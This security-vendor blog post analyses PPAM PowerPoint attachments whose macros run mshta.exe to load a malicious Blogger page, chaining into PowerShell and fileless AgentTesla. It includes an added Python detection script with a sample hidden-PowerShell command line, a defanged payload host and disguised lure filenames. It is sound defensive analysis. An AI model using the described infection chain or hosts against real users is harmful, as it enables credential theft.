In April 2021, the ASEC analysis team introduced on the ASEC blog the malware delivered via PowerPoint files attached to emails. The team has since found continued malicious activity that uses PPAM (macro-enabled PowerPoint add-in) files and is sharing its findings.
When the macro included in the PowerPoint file is executed, it uses mshta.exe to load the source of a blogspot page into which a malicious script has been inserted. A distinct feature of this case is that the chain has become more complicated with the addition of processes using powershell.exe and wscript.exe.
When the macro of the PPAM file containing the VBA code is executed, it calls an external script through mshta.exe. The site is confirmed to be a Blogger page (the final URL) with a malicious script inserted. The inserted script exists in two places: one is commented out, so executing it does nothing, and the malicious behavior is performed by the other script below. (The commented-out script is covered later in this post.)
When the inserted script in Figure 5 is decrypted, the code in Figure 6 is found. As shown in line 45, there is a script that executes after calling an external URL at line 39 (see Figure 5).
The script that is not commented out is written to download the web source of Google's main page, but if the attacker edits the URL, it can download scripts from a malicious website. Based on the characteristics observed in the malware's execution process, it was found through the internal infrastructure that files of the same type were being distributed.
The filenames of the PPT files distributed as attachments are usually disguised with a PDF extension as shown below. Looking at the period during which the files were collected through the internal infrastructure, it was confirmed that they have been widely distributed since around the end of July.
- ReservationId ,pdf.ppam
- swift copy,pdf.ppam
- Outstanding and Overdue Balances 31-07-21,pdf.ppam
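The two observable points above, the process chain (PowerPoint launching mshta.exe, which in turn loads a remote page and chains into powershell.exe or wscript.exe) and the ",pdf.ppam" double-extension disguise, are both easy to turn into detection logic. The following script is an added example written for this post, not code from ASEC or from the malware; the sample process-creation events and the blogspot URL in them are constructed placeholders, and the field names (parent, image, cmdline) are an assumed simplification of Sysmon-style telemetry.

```python
import re

# Office hosts that should rarely spawn script interpreters directly
OFFICE_HOSTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
# Script hosts named in the infection chain described in the post
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Attachment names that hide a macro-enabled extension behind "pdf",
# e.g. "swift copy,pdf.ppam" (separator before "pdf" may be , . ; _ or space)
DISGUISE_RE = re.compile(r"[.,;_ ]pdf\.(ppam|pptm|ppsm|docm|xlsm)$", re.IGNORECASE)


def is_disguised_attachment(name: str) -> bool:
    """True if the filename mimics a PDF but carries a macro-enabled Office extension."""
    return DISGUISE_RE.search(name.strip()) is not None


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_event(ev: dict) -> list:
    """Return the list of reasons an event looks like the PPAM -> mshta chain (empty if none)."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    reasons = []
    if parent in OFFICE_HOSTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if image == "mshta.exe" and URL_RE.search(cmd):
        reasons.append("mshta.exe loading a remote URL")
    if parent == "mshta.exe" and image in {"wscript.exe", "powershell.exe"}:
        reasons.append(f"mshta.exe chained into {image}")
    return reasons


def scan(events: list) -> dict:
    """Map event index -> reasons for every event that triggers at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = classify_event(ev)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample telemetry (assumption: simplified Sysmon-like fields, not real logs)
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://placeholder-blog.blogspot.com/p/page.html"},  # constructed URL
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c ..."},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Users\user\local.hta"},  # local HTA, no Office parent: not flagged
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},  # printing helper: not flagged
]

if __name__ == "__main__":
    for name in ["ReservationId ,pdf.ppam", "swift copy,pdf.ppam", "report.pdf"]:
        print(f"{name!r}: disguised={is_disguised_attachment(name)}")
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {'; '.join(reasons)}")
```

The filename rule deliberately matches any separator before "pdf" rather than only the comma seen here, since the trick only relies on the reader glancing at "pdf"; the process rule flags the Office-to-script-host edge on its own, so it still fires if the remote page is changed or served over a different host.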
The following is a brief description of the commented-out malicious script. All of the websites below that were found additionally have malicious scripts inserted. The shaded area in the figure (line 69) shows the command, which runs the CLASSID of “Wscript.Shell” through WMI. On the website ‘hxxps://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com’ found at the bottom of the script, AgentTesla malware exists in binary form, and if this script is executed, it runs filelessly in memory.
Ultimately, the malware from the April post mentioned at the beginning of this post (AgentTesla running filelessly) has become more complicated through commented-out malicious scripts and continues to be distributed to this day.
As we always say, since a substantial part of threats comes from spam emails, users should refrain from opening attachments in emails from unknown sources.
Also, users are advised to update the anti-malware engine pattern to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious files introduced in this post using the aliases below.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.